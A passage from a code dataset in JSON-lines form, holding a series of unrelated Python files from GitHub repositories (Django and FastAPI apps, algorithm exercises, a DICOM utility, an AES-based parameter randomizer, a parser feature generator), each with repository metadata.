set\n print(\"\\nData set found\\n\") # replace with function call that reads in data from file\n betterpush(work2do_file)\n print(\"\\n\")\n ##run commandpush\n commandpush(work2do) # call function to push commands to devices\n\n #run deviceboot\n deviceboot(iplist)\n\n#call main function\nmain()\n","repo_name":"mg9313/PythonBasiscs7-22-19","sub_path":"netfunct01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15730546335","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('horario', '0005_auto_20151221_2229'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='semana',\n name='id_año',\n ),\n migrations.AddField(\n model_name='semana',\n name='id_carrera_año',\n field=models.ForeignKey(to='horario.CarreraAño', default=0),\n preserve_default=False,\n ),\n ]\n","repo_name":"ucorreag/horario","sub_path":"horario_docente/apps/horario/migrations/0006_auto_20151224_1629.py","file_name":"0006_auto_20151224_1629.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15216863759","text":"from math import log, ceil\r\n\r\n\r\n\r\ndef solve_problem(L, P, C):\r\n intervals = int(ceil(log((P+L-1) / L, C)))\r\n tests = 0\r\n while intervals > 1:\r\n tests += 1\r\n intervals = (intervals + 1) / 2\r\n\r\n return tests\r\n \r\ndef run_process(args):\r\n return solve_problem(*args)\r\n\r\ndef process_file(fin, fout):\r\n def get_problem():\r\n return map(int, fin.readline().split(' '))\r\n \r\n numLines = int(fin.readline())\r\n problem_list = [get_problem() for i in range(numLines)]\r\n \r\n if False:\r\n from multiprocessing import Pool\r\n p = Pool(8)\r\n solution_list = p.map(run_process, problem_list)\r\n else:\r\n solution_list = map(run_process, problem_list)\r\n for i, s in enumerate(solution_list):\r\n fout.write(\"Case #%s: %s\\n\" % (i + 1, s))\r\n \r\nif __name__ == '__main__':\r\n from sys import argv\r\n process_file(open(argv[1]), open(argv[1].replace(\"in\", \"out\"), \"w\"))\r\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/10/32/0.py","file_name":"0.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"31411341633","text":"from typing import *\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\"\"\"\n 142 - Linked List Cycle II\n Time: O(n)\n Space: O(1)\n Note: Uses Floyds Algorithm\n\"\"\"\ndef detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n cycleFound = False\n slow, fast = head, head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n if slow == fast:\n cycleFound = True\n break\n if not cycleFound:\n return None\n slow2 = head\n while slow != slow2:\n slow = slow.next\n slow2 = slow2.next\n \n return slow","repo_name":"MelvinSam2000/leetcode-rs","sub_path":"python/q142.py","file_name":"q142.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37572520504","text":"a=input(\"Left or Right?\")\nif(a==\"left\"):\n print(\"Game Over\")\nelif(a==\"right\"):\n b=input(\"Swim or Wait?\")\n if(b==\"wait\"):\n print(\"End Game\")\n elif(b==\"swim\"):\n c=input(\"What color do you choose?\")\n if(c==\"yellow\"):\n print(\"You win\")\n else:\n print(\"Game over\")\n","repo_name":"Rajeevv8/pythonprograms","sub_path":"Basic ProblemSolving/treasurehunt.py","file_name":"treasurehunt.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72432084393","text":"import time\nimport logging\n\nimport requests\n\nlogger = logging.getLogger()\n\n\ndef fetch_stars(repo: str) -> int:\n url = f\"https://api.github.com/repos/{repo}\"\n logger.info(\"Fetching result from %s\", url)\n return requests.get(url).json()['stargazers_count']\n\n\ndef print_stars(repo: str):\n start_time = time.time()\n stars = fetch_stars(repo)\n duration = time.time() - start_time\n\n logger.info(\"Stars for %s: %s (took %.3fs)\", repo, stars, duration)\n\n\ndef main() -> None:\n log_format = \"%(asctime)s %(levelname)s [%(name)s] %(message)s\"\n logging.basicConfig(level=logging.INFO, format=log_format)\n\n print_stars(\"antirez/redis\")\n print_stars(\"aerospike/aerospike-server\")\n\n print_stars(\"antirez/redis\")\n print_stars(\"hazelcast/hazelcast\")\n\n print_stars(\"antirez/redis\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gavrie/pycourse2019-09","sub_path":"ex_05_2_memoize/memoize1_fetch.py","file_name":"memoize1_fetch.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38763195120","text":"from app.modules.user import User,db as udb\nfrom sqlalchemy import or_\nfrom app.data_handle.user_intro import user_intro\n\ndef query_user(phone='',token=''):\n user = User.query.filter(\n or_(\n User.username == phone,\n User.token == token\n )\n ).first()\n udb.session.close()\n return user_intro(user)","repo_name":"potatopeople/movie","sub_path":"movie-h/app/mysqls/query_user.py","file_name":"query_user.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25305278451","text":"'''\r\nUpdated: 10/11/2021\r\nAuthor: Alex Waters\r\n\r\nThis is a piece of utility code that unzips a Bruker Paravision 6 dicom archive,\r\nappends scan numbers to the dicom file names, and saves a montage of the dicom images\r\nfor quick reference.\r\n\r\nInput: Use file selection interface to choose a .tar.gz file containing Bruker \r\n DICOM folders as exported from the scanner (PV6)\r\n\r\nOutput: \r\n - Creates a directory 'tmpDICOM' into which the archive is unpacked\r\n - Inside the dicom folder for each scan, the scan number is appended to the dicom filenames\r\n (example: MRIm01.dcm becoms MRIm01__E5.dcm). This is useful when interleaving scans from \r\n different acquisitions.\r\n - Creates a montage for each scan and saves it as a .png file. The montage is also displayed\r\n as a plot, which is useful when running this code inside Spyder or a similar tool with an \r\n inline plot editor. Otherwise you may wish to comment it out.\r\n \r\nLimitations: The tmpDICOM directory can already exist, but should be empty at\r\n the time of running the script. Unpacked files and newly created\r\n montages should be transferred to a different directory after \r\n the script is run.\r\n\r\n'''\r\n\r\n\r\nimport os, re, tarfile\r\nimport numpy as np\r\nimport imageio\r\nfrom skimage.util import montage\r\nfrom matplotlib import pyplot as plt\r\nfrom tkinter.filedialog import askopenfilename\r\n\r\n\r\n\r\n# Rewrite the splitext function to handle .tar.gz\r\ndef splitext(path):\r\n for ext in ['.tar.gz', '.tar.bz2']:\r\n if path.endswith(ext):\r\n return path[:-len(ext)], path[-len(ext):]\r\n return os.path.splitext(path)\r\n\r\n\r\n# Get the filename and directory of the dicom archive\r\ndcmArchive = askopenfilename(initialdir=\"E:/MRI_Data/2018/Sandbox\",\r\n filetypes =((\"tarball\", \"*.tar.gz\"),(\"All Files\",\"*.*\")),\r\n title = \"Choose a DICOM archive.\"\r\n )\r\n\r\n# Untar the dicom archive if it exists\r\ntry:\r\n print (dcmArchive)\r\n if tarfile.is_tarfile(dcmArchive):\r\n print(\"it is a tar file.\")\r\n tfile=tarfile.open(dcmArchive,'r:gz')\r\n tfile.extractall(os.path.dirname(dcmArchive))\r\n tfile.close()\r\nexcept:\r\n print(\"There was an error extracting the DICOM archive. The file might be corrupt or missing.\")\r\n\r\n\r\norgDir=os.path.join(os.path.dirname(dcmArchive),'tmpDICOM')\r\n\r\n\r\nscanNumRegex=re.compile(r'__E\\d+')\r\n\r\nallDcmFolders=os.listdir(orgDir)\r\n\r\nfor dcmFolder in allDcmFolders:\r\n scanNumSrch=scanNumRegex.search(dcmFolder)\r\n if scanNumSrch == None:\r\n scanNum=''\r\n else:\r\n scanNum=scanNumSrch.group(0)\r\n\r\n allDcmFiles=os.listdir(os.path.join(orgDir,dcmFolder))\r\n image_list=[]\r\n for dcmFile in allDcmFiles:\r\n if scanNumRegex.search(dcmFile) == None:\r\n base_name, fileext=splitext(dcmFile)\r\n oldPath = os.path.join(orgDir,dcmFolder,base_name+fileext)\r\n newPath = os.path.join(orgDir,dcmFolder,base_name+scanNum+fileext)\r\n os.rename(oldPath,newPath)\r\n # ds = pydicom.dcmread(newPath)\r\n # cur_image = ds.pixel_array\r\n # image_list.append(cur_image)\r\n # num_images = len(image_list)\r\n # image_size = np.shape(image_list[0])\r\n # image_array = np.array(image_list)\r\n \r\n vol = imageio.volread(os.path.join(orgDir,dcmFolder), 'DICOM')\r\n \r\n #this_montage = montage(image_array)\r\n \r\n if np.ndim(vol) == 2:\r\n this_montage = vol\r\n else:\r\n this_montage = montage(vol)\r\n this_montage = (this_montage/np.amax(this_montage))*255\r\n \r\n # Remove these lines if you are not using a tool that supports inline plotting\r\n plt.imshow(this_montage.squeeze(), interpolation='nearest')\r\n plt.show()\r\n \r\n \r\n montage_name = dcmFolder+'_montage.png'\r\n imageio.imwrite(os.path.join(orgDir,montage_name),this_montage.astype('uint8'))\r\n\r\n","repo_name":"EAlexWaters/numberDicomMontage","sub_path":"NumberDicomMontage.py","file_name":"NumberDicomMontage.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31441472508","text":"import turtle\r\n\r\nsc = turtle.Screen() # let sc for screen\r\nsc.bgcolor(\"light green\") \r\nsc.title(\"5. use of pencolor and pensize\") \r\n\r\nsh = turtle.Turtle()\r\nsh.pencolor(\"red\")\r\nsh.pensize(3)\r\nsh.showturtle()\r\n\r\nfor i in range(6):\r\n sh.left(90)\r\n sh.forward(40)\r\n sh.right(90)\r\n sh.forward(40)\r\nfor j in range(2):\r\n sh.right(90)\r\n sh.forward(240)\r\n \r\nturtle.done()\r\n","repo_name":"sukhvir786/Python-Day-7-Graphics","sub_path":"graph5.py","file_name":"graph5.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3327946081","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\n\r\ndef merge_sort(arr):\r\n if len(arr) < 2:\r\n return arr\r\n\r\n mid = (len(arr)+1) // 2\r\n low_arr = merge_sort(arr[:mid])\r\n high_arr = merge_sort(arr[mid:])\r\n\r\n merged_arr = []\r\n l = h = 0\r\n while l < len(low_arr) and h < len(high_arr):\r\n if low_arr[l] < high_arr[h]:\r\n merged_arr.append(low_arr[l])\r\n answer.append(low_arr[l])\r\n l += 1\r\n else:\r\n merged_arr.append(high_arr[h])\r\n answer.append(high_arr[h])\r\n h += 1\r\n\r\n for i in range(l, len(low_arr)):\r\n answer.append(low_arr[i])\r\n merged_arr.append(low_arr[i])\r\n\r\n for j in range(h, len(high_arr)):\r\n answer.append(high_arr[j])\r\n merged_arr.append(high_arr[j])\r\n\r\n return merged_arr\r\n\r\n\r\nanswer = []\r\nN, M = map(int, input().split())\r\nlistA = list(map(int, input().split()))\r\n\r\n\r\nmerge_sort(listA)\r\n\r\n\r\nif len(answer) >= M:\r\n print(answer[M-1])\r\nelse:\r\n print(-1)","repo_name":"sknyuki/Algorithm","sub_path":"백준/Silver/24060. 알고리즘 수업 - 병합 정렬 1/알고리즘 수업 - 병합 정렬 1.py","file_name":"알고리즘 수업 - 병합 정렬 1.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43400693159","text":"SHIP_INFO = {\n \"CV\": 4, # 5 Ô\n \"OR\": 2, # 4 Ô\n \"CA\": 3,\n \"BB\": 4,\n \"DD\": 2\n}\n\nROW_OF_SHIP = {\n \"CV\": 2, # 5 Ô\n \"OR\": 2, # 4 Ô\n \"CA\": 1,\n \"BB\": 1,\n \"DD\": 1\n}\n\nclass ShipPattern:\n def getShipPattern(self, type, row, col, isVertical):\n ret = []\n\n if type == \"CV\":\n if isVertical:\n for i in range(4):\n ret.append([ row + i, col ])\n ret.append([ row + 1, col - 1 ])\n else:\n for i in range(4):\n ret.append([ row, col + i ])\n ret.append([ row - 1, col + 1 ])\n return ret\n if type == \"OR\":\n for i in range(2):\n for j in range(2):\n ret.append([ row + i, col + j ])\n return ret\n if type == \"CA\":\n length = 3\n elif type == \"BB\":\n length = 4\n else:\n # DD\n length = 2\n\n if isVertical:\n for i in range(length):\n ret.append({ row + i, col })\n else:\n for i in range(length):\n ret.append([ row, col + i ])\n return ret\n\nclass Ship:\n def __init__(self, type, row, col, isVertical):\n self.type = type\n self.length = SHIP_INFO[self.type]\n self.rows = ROW_OF_SHIP[self.type]\n pattern = ShipPattern()\n self.coordinates = pattern.getShipPattern(type, row, col, isVertical)\n\n","repo_name":"khacduy221997/battle-ships","sub_path":"api/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15226491452","text":"from fastapi import Depends, APIRouter\nfrom pydantic import BaseModel\nfrom .base import get_db\nfrom .auth import auth_class\nfrom sqlalchemy.orm import session\nimport models\nfrom fastapi.responses import JSONResponse\n\n\ntheatre_audi_router_and_seat_detail = APIRouter()\nauth = auth_class()\n\n\ndef seat_detail(detail, db):\n theatre_id = detail[\"theatre_id\"]\n audi_id = detail[\"audi_id\"]\n audi_name = detail[\"audi_name\"]\n audi_total_seat = detail[\"audi_total_seat\"]\n row = detail[\"row\"]\n column = detail[\"column\"]\n audi_seat_type = detail[\"audi_seat_type\"]\n\n total_seat_number = row * column\n\n seat_detail_data_json = []\n\n for i in range(row):\n row_character = chr(ord(\"A\") + i)\n for j in range(column):\n seat_detail_model = models.seat_detail_model()\n\n column_number = j + 1\n seat_id = f\"{row_character}{column_number}\"\n print(seat_id)\n\n seat_name = f\"{theatre_id}-{audi_id}-{audi_name}-{seat_id}\"\n seat_name_without_space = seat_name.replace(\" \", \"\")\n\n seat_detail_model.seat_name = seat_name_without_space\n seat_detail_model.theatre_id = theatre_id\n seat_detail_model.seat_id = seat_id\n seat_detail_model.audi_id = audi_id\n seat_detail_model.row = row\n seat_detail_model.column = column\n seat_detail_model.is_active = True\n seat_detail_model.seat_type = audi_seat_type\n seat_detail_model.total_seat = total_seat_number\n seat_detail_model.seat_status = int(1)\n\n db.add(seat_detail_model)\n db.commit()\n\n single_seat_data = {\n \"seat_name\": seat_detail_model.seat_name,\n \"theatre_id\": seat_detail_model.theatre_id,\n \"seat_id\": seat_detail_model.seat_id,\n \"audi_id\": seat_detail_model.audi_id,\n \"row\": seat_detail_model.row,\n \"column\": seat_detail_model.column,\n \"is_active\": seat_detail_model.is_active,\n \"seat_type\": seat_detail_model.seat_type,\n \"total_seat\": seat_detail_model.total_seat,\n \"seat_status\": seat_detail_model.seat_status,\n }\n\n seat_detail_data_json.append(single_seat_data)\n\n return seat_detail_data_json\n\n\nclass threatre_audi_schema(BaseModel):\n audi_name: str\n audi_total_seat: int\n row: int\n column: int\n audi_seat_type: str\n\n\n@theatre_audi_router_and_seat_detail.post(\"/theatre_audi\")\ndef theatre_audi(\n details: threatre_audi_schema,\n db: session = Depends(get_db),\n authenticate=Depends(auth.mid),\n):\n theatre_audi_model = models.theatre_audi_model()\n\n theatre_audi_model.theatre_id = authenticate[\"theatre_id\"]\n theatre_audi_model.audi_name = details.audi_name\n theatre_audi_model.audi_total_seat = details.audi_total_seat\n theatre_audi_model.row = details.row\n theatre_audi_model.column = details.column\n theatre_audi_model.audi_seat_type = details.audi_seat_type\n\n db.add(theatre_audi_model)\n db.commit()\n\n db.refresh(theatre_audi_model)\n\n theatre_audi_data_json = {\n \"theatre_id\": authenticate[\"theatre_id\"],\n \"audi_id\": theatre_audi_model.audi_id,\n \"audi_name\": details.audi_name,\n \"audi_total_seat\": details.audi_total_seat,\n \"row\": details.row,\n \"column\": details.column,\n \"audi_seat_type\": theatre_audi_model.audi_seat_type,\n }\n\n seat_detail_data = seat_detail(theatre_audi_data_json, db)\n\n theatre_id = authenticate[\"theatre_id\"]\n return JSONResponse(\n content={\n \"status\": 999,\n \"audi_data\": theatre_audi_data_json,\n \"seat_detail\": seat_detail_data,\n },\n status_code=200,\n )\n","repo_name":"mrshrestha0000/movie_cineplex","sub_path":"router_admin/theatre_audi.py","file_name":"theatre_audi.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2343632127","text":"import os\nimport re\nfrom typing import Optional\n\nimport schedule\nimport hashlib\nimport base64\nimport sqlite3\n\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\n\nfrom nomad.data.create_db import *\n# from nomad.data.create_db import DB_NAME, create_db, TABLE_NAME\n\nSEED = 69\n\n\ndef xor_shift():\n global SEED\n for i in range(10):\n SEED = (SEED * 1664525 + 1013904223) & 0xFFFFFFFF\n return SEED\n\n# for sqlite purposes\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n\nclass AESCipher:\n def __init__(self, byte_key):\n self.block_size = AES.block_size\n self.key = byte_key\n\n def encrypt(self, plain_text):\n plain_text = self._pad(plain_text)\n iv = Random.new().read(AES.block_size)\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return base64.b64encode(iv + cipher.encrypt(plain_text.encode()))\n\n def decrypt(self, encrypted_text):\n # some magic from SO\n altchars = b'+/'\n encrypted_text = re.sub(rb'[^a-zA-Z0-9%s]+' % altchars, b'', encrypted_text)\n missing_padding = len(encrypted_text) % 4\n if missing_padding:\n encrypted_text += b'=' * (4 - missing_padding)\n\n encrypted_text = base64.b64decode(encrypted_text, altchars)\n iv = encrypted_text[:AES.block_size]\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return self._unpad(cipher.decrypt(encrypted_text[AES.block_size:])).decode('utf-8')\n\n def _pad(self, s):\n return s + (self.block_size - len(s) % self.block_size) * \\\n chr(self.block_size - len(s) % self.block_size)\n\n @staticmethod\n def _unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\n\nclass Randomizer:\n def __init__(self, time_slot_len: int = 30, hashing_func: str = 'sha256'):\n self._hashing_func = hashing_func\n\n self._current_master_key = self._gen_master_key()\n schedule.every(time_slot_len).minutes.do(self._gen_master_key)\n\n create_db(dir_path='nomad/data')\n # self._session_master_dict = {} # {session_id : master_key}\n # schedule.every(time_slot_len).minutes.do(self._update_session_key_dict)\n\n @staticmethod\n def _gen_master_key():\n return xor_shift()\n\n @staticmethod\n def _get_db_controller() -> sqlite3.Connection:\n # if not os.path.isfile(f'nomad/data/{DB_NAME}'):\n # create_db()\n conn = sqlite3.connect(f'nomad/data/{DB_NAME}')\n conn.row_factory = dict_factory\n return conn\n\n def _get_master_key(self, session_id: str) -> Optional[str]:\n db = self._get_db_controller()\n c = db.cursor()\n resp = list(c.execute(f\"SELECT * FROM {TABLE_NAME} WHERE session_id = '{session_id}'\"))\n if resp:\n return resp[0]['master_key']\n\n def _add_new_connection(self, session_id: str):\n db = self._get_db_controller()\n c = db.cursor()\n c.execute(f\"INSERT INTO {TABLE_NAME} VALUES ('{session_id}', '{self._current_master_key}')\")\n db.commit()\n\n def _get_all_session_ids(self):\n db = self._get_db_controller()\n c = db.cursor()\n return [s_key['session_id']\n for s_key in list(c.execute(f\"SELECT session_id FROM {TABLE_NAME}\"))]\n\n def _update_session_key_dict(self): # TODO\n \"\"\"\n checks if there are session ids in keys that are no longer valid\n \"\"\"\n pass\n\n def _get_session_key(self, session_id: str, client_id: str) -> bytes:\n hash_container = hashlib.new(name=self._hashing_func)\n if session_id not in self._get_all_session_ids():\n self._add_new_connection(session_id)\n master_key = self._get_master_key(session_id)\n\n hash_container.update(str(master_key).encode('UTF-8'))\n hash_container.update(str(client_id).encode('UTF-8'))\n return hash_container.digest()\n\n def randomize_parameter(self, param_value, session_id, client_id):\n session_key = self._get_session_key(session_id, client_id)\n aes = AESCipher(byte_key=session_key)\n return aes.encrypt(param_value).decode('UTF-8')\n\n def derandomize_parameter(self, randomized_value, session_id, client_id):\n randomized_value = randomized_value.encode('UTF-8')\n session_key = self._get_session_key(session_id, client_id)\n aes = AESCipher(byte_key=session_key)\n return aes.decrypt(randomized_value)\n\n\nif __name__ == '__main__':\n session = 'abc'\n client = 'AlbertEinstein'\n parameter = 'someParam123'\n print(f'ORINAL KEY: {parameter}')\n r = Randomizer(time_slot_len=1)\n randomized = r.randomize_parameter(param_value=parameter, session_id=session, client_id=client)\n print(f'RANDOMIZED: {randomized}')\n derandomized = r.derandomize_parameter(randomized_value=randomized, session_id=session, client_id=client)\n print(f'DERANDOMIZED: {derandomized}')\n\n","repo_name":"Shrimpey/SPZC","sub_path":"nomad/randomizer.py","file_name":"randomizer.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74828102311","text":"from itertools import product\nfrom django.shortcuts import get_object_or_404\nfrom .models import Product, City, Warehouse, Stock\nfrom .serializers import ProductSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.renderers import JSONRenderer\nimport json\nfrom rest_framework import status\n\n# Check if the inventory item exists. If not, create it.\nclass CreateProductView(APIView):\n def post(self, request, format=None):\n title = request.data['name']\n desc = request.data['description']\n retail_price = request.data['price']\n code = request.data['upc']\n if not (Product.objects.filter(product_code = code).exists()):\n Product.objects.create(product_name = title, product_description = desc, product_msrp = retail_price, product_code = code)\n content = {\"detail\":\"Created new item.\"}\n return Response(content,status=status.HTTP_201_CREATED)\n else:\n content = {\"detail\":\"Item already exists.\"}\n return Response(content,status=status.HTTP_400_BAD_REQUEST)\n\n# If the inventory item exists, then update the items price. Otherwise throw an error.\n# I made the assumption that price can be changed more often than the other fields (name, code, description).\nclass EditProductView(APIView):\n def post(self, request, format=None):\n new_price = request.data['price']\n code = request.data['upc']\n if Product.objects.filter(product_code = code).exists():\n obj = Product.objects.filter(product_code = code)\n obj.update(product_msrp = new_price)\n content = {\"detail\":\"Updated item.\"}\n return Response(content,status=status.HTTP_200_OK)\n else:\n content = {\"detail\":\"Not found.\"}\n return Response(content,status=status.HTTP_404_NOT_FOUND)\n \n\n# If the inventory item exists, then delete inventory items. Otherwise throw an error.\nclass DeleteProductView(APIView):\n def post(self, request, format=None):\n code = request.data['upc']\n if Product.objects.filter(product_code = code).exists():\n obj = Product.objects.filter(product_code = code)\n obj.delete()\n content = {\"detail\":\"Deleted item.\"}\n return Response(content,status=status.HTTP_200_OK)\n else:\n content = {\"detail\":\"Not found.\"}\n return Response(content,status=status.HTTP_404_NOT_FOUND)\n\n# Return a list of all inventory items.\nclass GetAllProductsView(APIView):\n def get(self, request, format=None):\n objs = Product.objects.all()\n serializer = ProductSerializer(objs, many=True)\n d = JSONRenderer().render(serializer.data)\n items = json.loads(d)\n return Response({\"item_list\":items})\n\n# I made the assumption that a user might also want to search for a specific item.\n# Return a searched inventory item.\nclass GetProductView(APIView):\n def get(self, request, format=None):\n code = request.query_params.get('upc')\n item = get_object_or_404(Product, product_code = code)\n return Response({\n \"name\": item.product_name,\n \"description\": item.product_description,\n \"msrp\": item.product_msrp,\n \"upc\": item.product_code\n })\n\n# Check if the warehouse exists. If not, create a new warehouse.\nclass CreateWarehouseView(APIView):\n def post(self, request, format=None):\n building = request.data['building_name']\n street = request.data['street_add']\n city_loc = request.data['city']\n state_loc = request.data['state']\n zip = request.data['zipcode']\n\n if not (City.objects.filter(city_name = city_loc, state = state_loc, zipcode = zip).exists()):\n City.objects.create(city_name = city_loc, state = state_loc, zipcode = zip)\n\n city_obj = get_object_or_404(City, city_name = city_loc, state = state_loc, zipcode = zip)\n\n if not (Warehouse.objects.filter(warehouse_name = building, address = street).exists()):\n Warehouse.objects.create(warehouse_name = building, address = street, city_id = city_obj)\n content = {\"detail\":\"Created new warehouse.\"}\n return Response(content,status=status.HTTP_201_CREATED)\n else:\n content = {\"detail\":\"Warehouse already exists.\"}\n return Response(content,status=status.HTTP_400_BAD_REQUEST)\n\n# I made the assumption that the user knows what the item and warehouse is. If either of them do not exist in the database, throw an error.\n# Check if the inventory item exists in the warehouse. If not, assign the item to the warehouse.\nclass AssignProductWarehouseView(APIView):\n def post(self, request, format=None):\n code = request.data['upc']\n building = request.data['building_name']\n street = request.data['street_add']\n city_loc = request.data['city']\n state_loc = request.data['state']\n zip = request.data['zipcode']\n stock_amount = request.data['quant']\n item_obj = get_object_or_404(Product, product_code = code)\n city_obj = get_object_or_404(City, city_name = city_loc, state = state_loc, zipcode = zip)\n warehouse_obj = get_object_or_404(Warehouse, warehouse_name = building, address = street, city_id = city_obj)\n\n if not (Stock.objects.filter(product_id = item_obj, warehouse_id = warehouse_obj).exists()):\n Stock.objects.create(product_id = item_obj, warehouse_id = warehouse_obj, quantity = stock_amount)\n content = {\"detail\":\"Assigned items to warehouse.\"}\n return Response(content,status=status.HTTP_200_OK)\n else:\n content = {\"detail\":\"Item is already in warehouse.\"}\n return Response(content,status=status.HTTP_400_BAD_REQUEST)\n \n ","repo_name":"anthonyhom/Inventory-Backend-Challenge","sub_path":"shopify_challenge/inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72176963113","text":"import heapq\r\n\r\ndef solve(start_node):\r\n dist = [pow(10, 15)]*(n+1)\r\n dist[start_node] = 0\r\n pq = []\r\n heapq.heappush(pq, [0, start_node])\r\n while pq:\r\n current_dist, current_node = heapq.heappop(pq)\r\n for next_node, weight in li[current_node].items():\r\n next_dist = dist[current_node] + weight\r\n if next_dist < dist[next_node]:\r\n dist[next_node] = next_dist\r\n heapq.heappush(pq, [next_dist, next_node])\r\n return dist\r\n\r\nfor t in range(int(input())):\r\n n, m, s, e = map(int, input().split())\r\n li = [dict() for _ in range(n+1)]\r\n for _ in range(m):\r\n a, b, w = map(int, input().split())\r\n li[a][b], li[b][a] = w, w\r\n answer = solve(s)\r\n print('#' + str(t+1), str(answer[e]))","repo_name":"khw5123/Algorithm","sub_path":"SWExpert/1803. Shortest Path Faster.py","file_name":"1803. Shortest Path Faster.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34391719160","text":"\"\"\"\nUnigram:\nhform, hpos hform, hpos, dform, dpos hpos, bpos, dpos\nhform hpos, dform, dpos hpos, dpos, hpos+1, dpos-1\nhpos hform, dform, dpos hpos, dpos, hpos-1, dpos-1\ndform, dpos hform, hpos, dform hpos, dpos, hpos+1, dpos+1\ndform hform, hpos, dpos hpos, dpos, hpos-1, dpos+1\ndpos hform, dform\n hpos, dpos\n\"\"\"\nimport os\nfrom itertools import combinations\nfrom tqdm import tqdm\n\nfrom src.tools.CONLL06 import Token, Sentence, TreeBank\n\nHEAD = \"HEAD\"\nDEPE = \"DEPE\"\n\nFORM = \"FORM\"\nPOS = \"POS\"\n\nHEAD_FORM = f\"{HEAD}_{FORM}\"\nHEAD_POS = f\"{HEAD}_{POS}\"\nDEPE_FORM = f\"{DEPE}_{FORM}\"\nDEPE_POS = f\"{DEPE}_{POS}\"\n\nBASIC_FEATURES = (HEAD_FORM, HEAD_POS, DEPE_FORM, DEPE_POS)\n\nBETW = \"BETW\"\nNEXT = \"NEXT\"\nPREV = \"PREV\"\n\nBETW_POS = f\"{BETW}_{POS}\"\nHEAD_POS_NEXT = f\"{HEAD}_{POS}_{NEXT}\"\nHEAD_POS_PREV = f\"{HEAD}_{POS}_{PREV}\"\nDEPE_POS_NEXT = f\"{DEPE}_{POS}_{NEXT}\"\nDEPE_POS_PREV = f\"{DEPE}_{POS}_{PREV}\"\n\n\nclass TemplateWizard:\n @staticmethod\n def basic_templates():\n \"\"\"\n generates all combinations with length 1 to 4 of features\n \"\"\"\n grams = []\n for n in range(1, 5):\n for combination in combinations(BASIC_FEATURES, n):\n grams.append(combination)\n return tuple(grams)\n\n @staticmethod\n def extended_templates():\n return (\n (HEAD_POS, BETW_POS, DEPE_POS),\n (HEAD_POS, DEPE_POS, HEAD_POS_NEXT, DEPE_POS_NEXT),\n (HEAD_POS, DEPE_POS, HEAD_POS_PREV, DEPE_POS_NEXT),\n (HEAD_POS, DEPE_POS, HEAD_POS_NEXT, DEPE_POS_PREV),\n (HEAD_POS, DEPE_POS, HEAD_POS_PREV, DEPE_POS_PREV)\n )\n\n TEMPLATES = basic_templates() + extended_templates()\n\n @staticmethod\n def get_feature_keys(head: Token | int, dependant: Token | int, sentence: Sentence) -> list[str]:\n \"\"\"\n returns feature keys for an edge.\n Example:\n [\"HEAD_FORM_<I>,\", \"HEAD_POS_<PP>,\", ...\n \"DEPE_FORM_<cats>,DEPE_POS_<NN>,\", ...\n ]\n \"\"\"\n if not isinstance(head, Token):\n head = sentence.get_token_or_none_token(head)\n if not isinstance(dependant, Token):\n dependant = sentence.get_token_or_none_token(dependant)\n keys = []\n for template in TemplateWizard.TEMPLATES:\n key = f\"|{max(min(head.id_ - dependant.id_, + 5), -5)}|_\"\n for feature in template:\n token = TemplateWizard._get_relevant_token(feature, head, dependant, sentence)\n if FORM in feature:\n key += f\"{feature}_<{token.form}>,\"\n elif DEPE in feature:\n key += f\"{feature}_<{token.pos}>,\"\n keys.append(key)\n return keys\n\n @staticmethod\n def _get_relevant_token(feature, head: Token, dependent: Token, 